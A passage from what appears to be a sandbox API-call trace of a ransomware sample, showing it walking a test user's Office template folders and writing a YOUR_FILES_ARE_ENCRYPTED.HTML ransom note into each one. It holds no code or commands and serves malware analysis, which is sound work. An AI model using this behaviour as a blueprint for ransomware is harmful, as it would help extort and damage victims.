| out: hHeap=0x600000) returned 1 [0123.299] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x985f9d53, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x985f9d53, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3188410, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 0 [0123.299] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0123.299] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 144 [0123.299] GetProcessHeap () returned 0x600000 [0123.299] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Word Document Building Blocks\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\word document building blocks\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0123.300] WriteFile (in: hFile=0x30c, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0123.301] CloseHandle (hObject=0x30c) returned 1 [0123.301] GetProcessHeap () returned 0x600000 [0123.301] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.301] GetProcessHeap () returned 0x600000 [0123.301] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3350010 | out: hHeap=0x600000) returned 1 [0123.304] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="Word Document Building Blocks", cAlternateFileName="WORDDO~1")) returned 0 [0123.304] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0123.304] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 114 [0123.304] GetProcessHeap () returned 0x600000 [0123.304] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.305] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0123.306] WriteFile (in: hFile=0x318, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19de68, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19de68*=0x3c00, lpOverlapped=0x0) returned 1 [0123.307] CloseHandle (hObject=0x318) returned 1 [0123.307] GetProcessHeap () returned 0x600000 [0123.307] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.307] GetProcessHeap () returned 0x600000 [0123.307] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.307] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311b068, dwReserved1=0x6f4620, cFileName="User", cAlternateFileName="")) returned 1 [0123.307] StrStrIW (lpFirst="User", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.307] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned 81 [0123.307] GetProcessHeap () returned 0x600000 [0123.307] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3340008 [0123.307] lstrcpyW (in: lpString1=0x3340008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User" [0123.307] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*" [0123.307] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0123.309] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96dfa773, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96ec9752, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="..", cAlternateFileName="")) returned 1 [0123.309] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 1 [0123.309] StrStrIW (lpFirst="Document Themes", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.309] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned 97 [0123.309] GetProcessHeap () returned 0x600000 [0123.309] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3350010 [0123.309] lstrcpyW (in: lpString1=0x3350010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0123.309] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*" [0123.309] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName=".", cAlternateFileName="")) returned 0x626638 [0123.310] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="..", cAlternateFileName="")) returned 1 [0123.310] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 1 [0123.310] StrStrIW (lpFirst="1033", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.310] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned 102 [0123.310] GetProcessHeap () returned 0x600000 [0123.310] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0123.311] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0123.311] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*" [0123.311] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3154094, dwReserved1=0x3153fd0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0123.312] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3154094, dwReserved1=0x3153fd0, cFileName="..", cAlternateFileName="")) returned 1 [0123.312] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3154094, dwReserved1=0x3153fd0, cFileName="..", cAlternateFileName="")) returned 0 [0123.312] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0123.312] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 132 [0123.312] GetProcessHeap () returned 0x600000 [0123.312] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.312] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\1033\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0123.313] WriteFile (in: hFile=0x214, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0123.314] CloseHandle (hObject=0x214) returned 1 [0123.315] GetProcessHeap () returned 0x600000 [0123.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.315] GetProcessHeap () returned 0x600000 [0123.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.315] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 0 [0123.315] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0123.316] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0123.316] GetProcessHeap () returned 0x600000 [0123.316] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0123.317] WriteFile (in: hFile=0x30c, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19db54, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19db54*=0x3c00, lpOverlapped=0x0) returned 1 [0123.318] CloseHandle (hObject=0x30c) returned 1 [0123.318] GetProcessHeap () returned 0x600000 [0123.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.318] GetProcessHeap () returned 0x600000 [0123.318] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3350010 | out: hHeap=0x600000) returned 1 [0123.319] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632e92, dwReserved1=0x632df8, cFileName="SmartArt Graphics", cAlternateFileName="SMARTA~1")) returned 1 [0123.319] StrStrIW (lpFirst="SmartArt Graphics", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.319] wnsprintfW (in: pszDest=0x3340008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics") returned 99 [0123.319] GetProcessHeap () returned 0x600000 [0123.320] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3350010 [0123.321] lstrcpyW (in: lpString1=0x3350010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics" [0123.321] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*" [0123.321] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\*", lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName=".", cAlternateFileName="")) returned 0x626978 [0123.321] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="..", cAlternateFileName="")) returned 1 [0123.321] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6db248, dwReserved1=0x632e00, cFileName="1033", cAlternateFileName="")) returned 1 [0123.321] StrStrIW (lpFirst="1033", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.321] wnsprintfW (in: pszDest=0x3350010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033") returned 104 [0123.321] GetProcessHeap () returned 0x600000 [0123.321] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x670340 [0123.322] lstrcpyW (in: lpString1=0x670340, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033" [0123.322] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*" [0123.323] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dc8f0, dwReserved1=0x6dc828, cFileName=".", cAlternateFileName="")) returned 0x626638 [0123.323] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dc8f0, dwReserved1=0x6dc828, cFileName="..", cAlternateFileName="")) returned 1 [0123.323] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96e30af9, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96e30af9, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96e30af9, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dc8f0, dwReserved1=0x6dc828, cFileName="..", cAlternateFileName="")) returned 0 [0123.323] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0123.323] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 134 [0123.323] GetProcessHeap () returned 0x600000 [0123.323] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\SmartArt Graphics\\1033\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\smartart graphics\\1033\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0123.324] WriteFile (in: hFile=0x214, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, 